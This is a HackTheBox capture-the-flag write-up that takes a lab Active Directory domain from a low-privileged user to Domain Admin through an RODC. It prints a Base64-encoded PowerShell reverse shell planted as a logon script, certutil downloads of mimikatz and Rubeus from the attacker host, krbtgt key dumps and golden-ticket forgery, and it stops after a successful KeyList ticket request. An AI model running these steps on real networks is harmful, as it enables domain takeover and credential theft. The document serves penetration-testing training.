HackTheBox - Garfield

Updated 10-04-2026
#htb #hackthebox #ctf #writeup #windows #crackmapexec #evil-winrm #privilege-escalation #active-directory #domain-controller #kerberos #chisel #proxychains #impacket #rodc #smb #ldap #bloodhound #logon-script-abuse #scriptpath #forcepaswordchange #rbcd #resource-based-constrained-delegation #golden-ticket #rubeus #mimikatz #bloodyad #faketime #clock-skew #krbtgt #windows-server-2019

A Windows Active Directory environment built around a Read-Only Domain Controller — abusing writable AD attributes and a carefully constructed Kerberos delegation chain leads from a low-privileged domain user to Domain Admin.

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
$ ip=10.129.23.25; ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '
' ',' | sed s/,$//); nmap -p$ports -sC -sV $ip
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-05 13:47 -0400
Nmap scan report for 10.129.23.25
Host is up (0.24s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: garfield.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
2179/tcp  open  vmrdp?
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: garfield.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: GARFIELD
|   NetBIOS_Domain_Name: GARFIELD
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: garfield.htb
|   DNS_Computer_Name: DC01.garfield.htb
|   DNS_Tree_Name: garfield.htb
|   Product_Version: 10.0.17763
|_  System_Time: 2026-04-06T01:47:05+00:00
|_ssl-date: 2026-04-06T01:47:45+00:00; +8h00m02s from scanner time.
| ssl-cert: Subject: commonName=DC01.garfield.htb
| Not valid before: 2026-02-13T01:10:36
|_Not valid after:  2026-08-15T01:10:36
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: mean: 8h00m01s, deviation: 0s, median: 8h00m01s
| smb2-time: 
|   date: 2026-04-06T01:47:05
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.15 seconds

The scan confirms a Domain Controller for garfield.htb (DC01.garfield.htb). Notable findings:

  • 2179/tcp — VM RDP, suggesting a guest VM (likely RODC01) on an internal network
  • 5985/tcp — WinRM available
  • 8-hour clock skew — Kerberos operations will require time synchronisation
  • SMB signing is required on DC01

Foothold

Hosts File

1
$ echo '10.129.23.25 garfield.htb dc01.garfield.htb' | sudo tee -a /etc/hosts

SMB Share Enumeration

We start with credentials j.arbuckle:Th1sD4mnC4t!@1978:

1
2
3
4
5
6
7
8
9
10
11
$ crackmapexec smb 10.129.23.25 -u j.arbuckle -p 'Th1sD4mnC4t!@1978' --shares
SMB         10.129.23.25    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:garfield.htb) (signing:True) (SMBv1:False)
SMB         10.129.23.25    445    DC01             [+] garfield.htb\j.arbuckle:Th1sD4mnC4t!@1978 
SMB         10.129.23.25    445    DC01             [+] Enumerated shares
SMB         10.129.23.25    445    DC01             Share           Permissions     Remark
SMB         10.129.23.25    445    DC01             -----           -----------     ------
SMB         10.129.23.25    445    DC01             ADMIN$                          Remote Admin
SMB         10.129.23.25    445    DC01             C$                              Default share
SMB         10.129.23.25    445    DC01             IPC$            READ            Remote IPC
SMB         10.129.23.25    445    DC01             NETLOGON        READ            Logon server share 
SMB         10.129.23.25    445    DC01             SYSVOL          READ            Logon server share

Domain User Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
$ ldapsearch -x -H ldap://10.129.23.25 -D "j.arbuckle@garfield.htb" -w 'Th1sD4mnC4t!@1978' -b "dc=garfield,dc=htb" "(objectClass=user)" sAMAccountName   
# extended LDIF
#
# LDAPv3
# base <dc=garfield,dc=htb> with scope subtree
# filter: (objectClass=user)
# requesting: sAMAccountName 

# Administrator, Users, garfield.htb
dn: CN=Administrator,CN=Users,DC=garfield,DC=htb
sAMAccountName: Administrator

# Guest, Users, garfield.htb
dn: CN=Guest,CN=Users,DC=garfield,DC=htb
sAMAccountName: Guest

# DC01, Domain Controllers, garfield.htb
dn: CN=DC01,OU=Domain Controllers,DC=garfield,DC=htb
sAMAccountName: DC01$

# krbtgt, Users, garfield.htb
dn: CN=krbtgt,CN=Users,DC=garfield,DC=htb
sAMAccountName: krbtgt

# RODC01, Domain Controllers, garfield.htb
dn: CN=RODC01,OU=Domain Controllers,DC=garfield,DC=htb
sAMAccountName: RODC01$

# krbtgt_8245, Users, garfield.htb
dn: CN=krbtgt_8245,CN=Users,DC=garfield,DC=htb
sAMAccountName: krbtgt_8245

# Jon Arbuckle, Users, garfield.htb
dn: CN=Jon Arbuckle,CN=Users,DC=garfield,DC=htb
sAMAccountName: j.arbuckle

# Liz Wilson, Users, garfield.htb
dn: CN=Liz Wilson,CN=Users,DC=garfield,DC=htb
sAMAccountName: l.wilson

# Liz Wilson ADM, Users, garfield.htb
dn: CN=Liz Wilson ADM,CN=Users,DC=garfield,DC=htb
sAMAccountName: l.wilson_adm

# search result
search: 2
result: 0 Success

# numResponses: 13
# numEntries: 9
# numReferences: 3

The presence of krbtgt_8245 and RODC01$ tells us there is a Read-Only Domain Controller in the environment. The RODC has its own krbtgt account (krbtgt_8245) whose keys, if obtained, can be used to forge tickets valid against RODC01.

SYSVOL Enumeration

Download the full SYSVOL share recursively:

1
2
3
4
5
$ smbclient //garfield.htb/SYSVOL -U j.arbuckle%'Th1sD4mnC4t!@1978'   
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

GptTmpl.inf at garfield.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit reveals that l.wilson has the SeBatchLogonRight privilege — meaning she can log on as a batch job, which is consistent with logon script execution.

BloodHound Enumeration

Running bloodhound-python directly fails with a Kerberos clock skew error:

1
2
3
4
5
$ bloodhound-python -u j.arbuckle -p 'Th1sD4mnC4t!@1978' -d garfield.htb --domain-controller DC01.garfield.htb --nameserver 10.129.23.25 -c All   
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: garfield.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

ntpdate to sync the clock also fails — it appears to be blocked by the target. Use faketime to spoof the correct time for the command without modifying the system clock:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ faketime "$(ntpdate -q 10.129.23.25 | cut -d ' ' -f 1,2)" bloodhound-python -u j.arbuckle -p 'Th1sD4mnC4t!@1978' -d garfield.htb --domain-controller DC01.garfield.htb --nameserver 10.129.23.25 -c All
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: garfield.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: DC01.garfield.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Found 8 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: RODC01.garfield.htb
INFO: Querying computer: DC01.garfield.htb
INFO: Done in 00M 37S

Upload the JSON files to BloodHound:

1
2
3
4
5
6
7
8
$ ls -la             
-rw-rw-r--  1 kali kali  7491 Apr  5 14:24 20260405222400_computers.json
-rw-rw-r--  1 kali kali 24787 Apr  5 14:24 20260405222400_containers.json
-rw-rw-r--  1 kali kali  3092 Apr  5 14:24 20260405222400_domains.json
-rw-rw-r--  1 kali kali  3966 Apr  5 14:24 20260405222400_gpos.json
-rw-rw-r--  1 kali kali 84112 Apr  5 14:24 20260405222400_groups.json
-rw-rw-r--  1 kali kali  2005 Apr  5 14:24 20260405222400_ous.json
-rw-rw-r--  1 kali kali 18501 Apr  5 14:24 20260405222400_users.json
1
$ bloodhound

Navigate to http://127.0.0.1:8080/ui/ and import the JSON files. BloodHound reveals the following attack path:

  • j.arbuckle has write access to scriptPath on multiple accounts
  • l.wilson has ForceChangePassword on l.wilson_adm
  • l.wilson_adm is a member of TIER 1 which has AddSelf on RODC ADMINISTRATORS
  • l.wilson_adm has ForceChangePassword and WriteAccountRestrictions on RODC01$
  • RODC01$ can ForceChangePassword on krbtgt_8245

bloodyAD confirms we have write access to scriptPath on several accounts including l.wilson:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ bloodyAD --host 10.129.23.25 -d garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' get writable --detail

distinguishedName: CN=Guest,CN=Users,DC=garfield,DC=htb
scriptPath: WRITE

distinguishedName: CN=krbtgt_8245,CN=Users,DC=garfield,DC=htb
scriptPath: WRITE

distinguishedName: CN=Jon Arbuckle,CN=Users,DC=garfield,DC=htb
<--SNIP-->
scriptPath: WRITE
<--SNIP-->

distinguishedName: CN=Liz Wilson,CN=Users,DC=garfield,DC=htb
scriptPath: WRITE

distinguishedName: CN=Liz Wilson ADM,CN=Users,DC=garfield,DC=htb
scriptPath: WRITE

Logon Script Abuse — Reverse Shell as l.wilson

The scriptPath attribute on a user object specifies a batch script that runs automatically when the user logs in. Since we can write to SYSVOL and set scriptPath on l.wilson, we can plant a malicious script that fires a reverse shell the next time she authenticates.

Generate the PowerShell reverse shell payload as a Base64-encoded command:

1
2
3
4
5
6
7
8
9
$ echo '$client = New-Object System.Net.Sockets.TCPClient("10.10.16.27",4444);
$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){
$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);
$sendback=(iex $data 2>&1|Out-String);
$sendback2=$sendback+"PS "+(pwd).Path+"> ";
$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
$client.Close()' | iconv -t UTF-16LE | base64 -w0

Build printerDetect.bat with the encoded payload:

1
2
3
4
cat > printerDetect.bat << 'EOF'
@echo off
powershell -NoP -NonI -W Hidden -Exec Bypass -Enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgA3ACIALAA0ADQANAA0ACkAOwAKACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsACgB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAMAAsACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewAKACQAZABhAHQAYQA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAkAGkAKQA7AAoAJABzAGUAbgBkAGIAYQBjAGsAPQAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA7AAoAJABzAGUAbgBkAGIAYQBjAGsAMgA9ACQAcwBlAG4AZABiAGEAYwBrACsAIgBQAFMAIAAiACsAKABwAHcAZAApAC4AUABhAHQAaAArACIAPgAgACIAOwAKACQAcwBlAG4AZABiAHkAdABlAD0AKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXAA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAKACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsACgAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQAKAA==
EOF

Upload printerDetect.bat to the SYSVOL scripts folder:

1
2
3
$ smbclient //garfield.htb/SYSVOL -U j.arbuckle%'Th1sD4mnC4t!@1978'
smb: \> cd garfield.htb\scripts
smb: \garfield.htb\scripts\> put printerDetect.bat

Set l.wilson‘s scriptPath to point to the malicious script:

1
$ bloodyAD --host garfield.htb -d garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' set object "l.wilson" scriptPath -v printerDetect.bat

Start a listener and wait for l.wilson to log in:

1
$ nc -lnvp 4444

After a short wait, the shell arrives. Now use l.wilson‘s session to reset l.wilson_adm‘s password — BloodHound confirmed she has ForceChangePassword over this account:

1
2
PS C:\Users\l.wilson\Documents> $NewPassword = ConvertTo-SecureString "Password123" -AsPlainText -Force
PS C:\Users\l.wilson\Documents> Set-ADAccountPassword -Identity l.wilson_adm -NewPassword $NewPassword -Reset

Log in as l.wilson_adm via WinRM and collect the user flag:

1
2
3
$ evil-winrm -i garfield.htb -u l.wilson_adm -p Password123
*Evil-WinRM* PS C:\Users\l.wilson_adm> cd ../Desktop
*Evil-WinRM* PS C:\Users\l.wilson_adm\Desktop> type user.txt

Privilege Escalation

BloodHound already mapped the full path to SYSTEM on the DC. The steps are:

  1. Add l.wilson_adm to RODC ADMINISTRATORS to gain admin access to RODC01.
  2. Set up RBCD on RODC01$ to get a service ticket as Administrator.
  3. Tunnel into the internal network to reach RODC01 (192.168.100.2).
  4. Use Mimikatz on RODC01 to extract the krbtgt_8245 AES256 key.
  5. Manipulate the RODC Password Replication Policy to allow Administrator‘s password to replicate.
  6. Forge a golden ticket signed with krbtgt_8245 and redeem it against DC01.

Add l.wilson_adm to RODC ADMINISTRATORS

1
*Evil-WinRM* PS C:\Users\l.wilson_adm\Documents> Add-ADGroupMember -Identity "RODC ADMINISTRATORS" -Members "l.wilson_adm"

RBCD on RODC01$ for SYSTEM Access

Resolve RODC01‘s internal IP:

1
2
3
4
5
6
*Evil-WinRM* PS C:\Users\l.wilson_adm\Documents> nslookup RODC01.garfield.htb
Server:  localhost
Address:  127.0.0.1

Name:    RODC01.garfield.htb
Address:  192.168.100.2

Create a fake machine account and configure RBCD — this grants FAKEPC$ the right to impersonate any user on RODC01$ via S4U2Proxy:

1
2
3
4
$ impacket-addcomputer garfield.htb/l.wilson_adm:'Password123' -computer-name 'FAKEPC$' -computer-pass 'Password123!' -dc-ip garfield.htb
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account FAKEPC$ with password Password123!.
1
2
3
4
5
6
7
8
$ impacket-rbcd garfield.htb/l.wilson_adm:'Password123' -delegate-from 'FAKEPC$' -delegate-to 'RODC01$' -action write -dc-ip garfield.htb 
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] FAKEPC$ can now impersonate users on RODC01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     FAKEPC$      (S-1-5-21-2502726253-3859040611-225969357-10601)

Request the service ticket. The first attempt fails on clock skew:

1
2
3
4
5
$ impacket-getST garfield.htb/'FakePC$':'Password123!' -spn cifs/RODC01.garfield.htb -impersonate Administrator -dc-ip garfield.htb

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

Sync the clock and retry:

1
2
3
4
5
6
7
8
9
10
11
$ sudo ntpdate -s 10.129.25.166 

$ impacket-getST garfield.htb/'FakePC$':'Password123!' -spn cifs/RODC01.garfield.htb -impersonate Administrator -dc-ip garfield.htb
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_RODC01.garfield.htb@GARFIELD.HTB.ccache

Chisel Tunnel to RODC01

RODC01 is on the internal 192.168.100.0/24 subnet and is not directly reachable from the attack machine. Set up a Chisel SOCKS5 tunnel through DC01.

Serve and download chisel.exe on the target:

1
$ python3 -m http.server 80
1
*Evil-WinRM* PS C:\Users\l.wilson_adm\Documents> certutil -urlcache -split -f http://10.10.16.27/chisel.exe

Start the Chisel server on the attack machine:

1
$ chisel server --reverse -p 9999

Connect from the target:

1
*Evil-WinRM* PS C:\Users\l.wilson_adm\Documents> .\chisel.exe client 10.10.16.27:9999 R:socks

Connect to RODC01 and Extract krbtgt_8245 Keys

Export the ticket and use psexec through the tunnel to connect to RODC01:

1
$ export KRB5CCNAME=Administrator@cifs_RODC01.garfield.htb@GARFIELD.HTB.ccache
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ proxychains impacket-psexec garfield.htb/Administrator@RODC01.garfield.htb -k -no-pass -dc-ip garfield.htb -target-ip 192.168.100.2
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.2:445  ...  OK
[*] Requesting shares on 192.168.100.2.....
[*] Found writable share ADMIN$
[*] Uploading file nFlSEZjf.exe
[*] Opening SVCManager on 192.168.100.2.....
[*] Creating service Cwhx on 192.168.100.2.....
[*] Starting service Cwhx.....
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.2:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.2:445  ...  OK
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.8511]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Download Mimikatz to RODC01 and extract the krbtgt_8245 keys:

1
2
3
4
5
6
7
C:\Windows\system32> cd C:\Windows\Temp

C:\Windows\Temp> certutil -urlcache -split -f http://10.10.16.27/mimikatz.exe
****  Online  ****
  000000  ...
  131308
CertUtil: -URLCache command completed successfully. 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
C:\Windows\Temp> .\mimikatz.exe

privilege::debug
mimikatz # Privilege '20' OK

lsadump::lsa /inject /name:krbtgt_8245
mimikatz # Domain : GARFIELD / S-1-5-21-2502726253-3859040611-225969357

RID  : 00000643 (1603)
User : krbtgt_8245

 * Primary
    NTLM : 445aa4221e751da37a10241d962780e2
    LM   : 
  Hash NTLM: 445aa4221e751da37a10241d962780e2

 * Kerberos-Newer-Keys
    Default Salt : GARFIELD.HTBkrbtgt_8245
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240
      aes128_hmac       (4096) : 124c0fd09f5fa4efca8d9f1da91369e5
      des_cbc_md5       (4096) : d540fe6192b9ecfe

 * NTLM-Strong-NTOWF
    Random Value : f4b51c2c0d006172304e31dbc6e0de6b

Mimikatz gives us the AES256 key, the NTLM hash, and the domain SID — the three ingredients needed to forge a ticket as any user in the domain using krbtgt_8245.

Manipulate RODC Password Replication Policy

We can’t modify the Allowed RODC Password Replication Group directly, but the Password Replication Policy is also controlled by two attributes on the RODC computer object: msDS-RevealOnDemandGroup (allow list) and msDS-NeverRevealGroup (deny list). As an RODC administrator, l.wilson_adm has write access to these attributes.

Clear the deny list first, then add Administrator to the allow list:

1
$ bloodyAD -u l.wilson_adm -p 'Password123' -d garfield.htb --host garfield.htb set object 'RODC01$' msDS-NeverRevealGroup
1
$ bloodyAD -u l.wilson_adm -p 'Password123' -d garfield.htb --host garfield.htb set object 'RODC01$' msDS-RevealOnDemandGroup -v 'CN=Administrator,CN=Users,DC=garfield,DC=htb'

Forge the Golden Ticket and Connect to DC01

We download Rubeus (Ghostpack Compiled Binaries) v4.8.1 compiled binary and serve the files using Python’s HTTP Server

1
$ python3 -m http.server 80

Back on DC01 as l.wilson_adm, download and forge a golden ticket signed with krbtgt_8245‘s AES256 key:

1
2
3
4
5
6
7
$ evil-winrm -i garfield.htb -u l.wilson_adm -p Password123

*Evil-WinRM* PS C:\Users\l.wilson_adm\Documents> certutil -urlcache -split -f http://10.10.16.27/Rubeus.exe
****  Online  ****
  000000  ...
  043e00
CertUtil: -URLCache command completed successfully.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
*Evil-WinRM* PS C:\Users\l.wilson_adm\Documents> .\Rubeus.exe golden /rodcNumber:8245 /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:ticket.kirbi /aes256:d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240 /user:Administrator /id:500 `
/domain:garfield.htb /sid:S-1-5-21-2502726253-3859040611-225969357

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2

[*] Action: Build TGT

[*] Building PAC

[*] Domain         : GARFIELD.HTB (GARFIELD)
[*] SID            : S-1-5-21-2502726253-3859040611-225969357
[*] UserId         : 500
[*] Groups         : 520,512,513,519,518
[*] ServiceKey     : D6C93CBE006372ADB8403630F9E86594F52C8105A52F9B21FEF62E9C7A75E240
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey         : D6C93CBE006372ADB8403630F9E86594F52C8105A52F9B21FEF62E9C7A75E240
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service        : krbtgt
[*] Target         : garfield.htb

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@garfield.htb'

[*] AuthTime       : 4/10/2026 5:47:46 PM
[*] StartTime      : 4/10/2026 5:47:46 PM
[*] EndTime        : 4/11/2026 3:47:46 AM
[*] RenewTill      : 4/17/2026 5:47:46 PM

[*] base64(ticket.kirbi):

doIFkjCCBY6gAwIBBaEDAgEWooIEfzCCBHthggR3MIIEc6ADAgEFoQ4bDEdBUkZJRUxELkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMZ2FyZmllbGQuaHRio4IENzCCBDOgAwIBEqEGAgQgNQAAooIEIgSCBB7xbZCb8NBEaxrEu8MGJUZUjgqgeQLbBR/9cag/d/JgyhwbvmW35yLzEzKKtuZfsDjYHG5QNTHwW6Puz00R8r09gGAR/nbTHHZ8t6nlvgVLflXRZBRfeZ/QpsBXo8FSMBD9Xqt/2Z+i2h/HitHoSMVM6nkzhrChfwxDHeXrXsPGQxP7eVVycSscJB2qeNmPUtryr387614EvHNkUU2/S4IkLlrVZGDfu0ZRN2p3TM6LzE7HEeVUmIx7T8KrxDOPd0zBRgPuvCxC63DprVGlnSMTcRct7eibXQ84HobqqyHMoQdkceT84vDjnwGuADLT1EPgmOiKDlE6l2iUYFx8kde9odbemRClXqentUFoMo6nMZ1Ygqt0Vuw60D1ScnUQsbyTGK7benzCXH5Si7Du/euKZu/EcEjo0UfFVeTRJOM6roSkX7yO+DAr3c43ejKvtANgMa2rP5G8t0UA0cAJ8gFoGk+keqkoCf8lV6p8c08YQnlYL17SiKV6aBZPWcmvWvN31KJDeRKRY2ZFTQUD+/2q+wjGtfHB5lf+C1xIs/0tArOINPLSMsGfaTjuFIPFZenZpXNRZmY2N0FeEO4uIUHLp2RrOz5CMLA9UNrlnSfNKip0HR4GKFOi1h4hjt9UCLd1A6uUsajEXtW6WXuDVnPGB4rWVD5ybn2a74k40F5DOLtm/RSJORR4NOdHL9tP+OFuLuLuX8FrzF+9I5+RRQq2KPqnOMmw8dmHl5lYN4VNcnzfxprJQp1rd7t5cEaVOZB9jqdJ+CFy3oNWrQj52jaHKd0mvgBPIV3AG20QUR1uFs/sQvZ5i7c0+0GhwMcLQ8RiW+fc4P/aiAPW5oZtzlqoYK4sDn0bILnt9kqYVIYwoDjPcUOm6a1zeLQaUN5gMkA4i68Y5fj/BQA+4VjwWR8IIFh+FpkZbIsLFPPUb6PcrcE07eMXWew2DsVURrJNbIqSiUkYls55aKtilbrZb/Ew+Jch++Kj4+wTRPIxUkaGjrapsQWyv6asfhSkL3CR7FWmcQtlRCgZE6A0/TZBfi/y84EQFQ4yjwvAsH06xvYid1owng6qJk5KV7TAxSeb2j7AH58FUUx5JAcp68JDwjf2Cpy1dN9TSdIijetLVWn8ihjPG1/3hZsz6oLrcXu6RKqpZkqOVKyYq5sla2/HOYqmI8AwBIPhbG8PzNLUL0m0nvrtrxtKiNfPHn+y8LoIyGCugpUWZ47TA+RPUx2xeD7/eahlu8TCBrIkP5kpKboNnIPV8FXGeD2rKrNZ70kV09qM4iJAOhdgBrLImfjv8x0Juqrrq4ZajTNWAIic8E+m6QQbXLKbfQHRlyuS8GFpXVKhvhNnSPra4wEW0/V00FmQUQ23TX7u9E8cr4uWCsAsp4n5Up2K9cVTtEcirgX/o4H+MIH7oAMCAQCigfMEgfB9ge0wgeqggecwgeQwgeGgKzApoAMCARKhIgQg/6CeQW268uubh3SX7K1b1rR2nfb5mM1mEK2tQIqSIvahDhsMR0FSRklFTEQuSFRCohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQIEAAKQRGA8yMDI2MDQxMTAwNDc0NlqlERgPMjAyNjA0MTEwMDQ3NDZaphEYDzIwMjYwNDExMTA0NzQ2WqcRGA8yMDI2MDQxODAwNDc0NlqoDhsMR0FSRklFTEQuSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxnYXJmaWVsZC5odGI=


[*] Ticket written to ticket_2026_04_11_00_47_46_Administrator_to_krbtgt@GARFIELD.HTB.kirbi

The golden ticket is signed with krbtgt_8245 but needs to be validated by the DC. Use Rubeus asktgs with /keyList to request a real TGS from DC01 — this is the RODC KeyList attack, where DC01 validates the RODC-signed ticket and issues a proper service ticket:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
*Evil-WinRM* PS C:\Users\l.wilson_adm\Documents> .\Rubeus.exe asktgs /enctype:aes256 /keyList /service:krbtgt/garfield.htb /dc:DC01.garfield.htb /ticket:ticket_2026_04_11_00_47_46_Administrator_to_krbtgt@GARFIELD.HTB.kirbi /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2

[*] Action: Ask TGS

[*] Requesting 'aes256_cts_hmac_sha1' etype for the service ticket
[*] Building KeyList TGS-REQ request for: 'Administrator'
[*] Using domain controller: DC01.garfield.htb (fe80::dd9d:e3db:1f74:a946%7)
[+] TGS request successful!
[*] base64(ticket.kirbi):

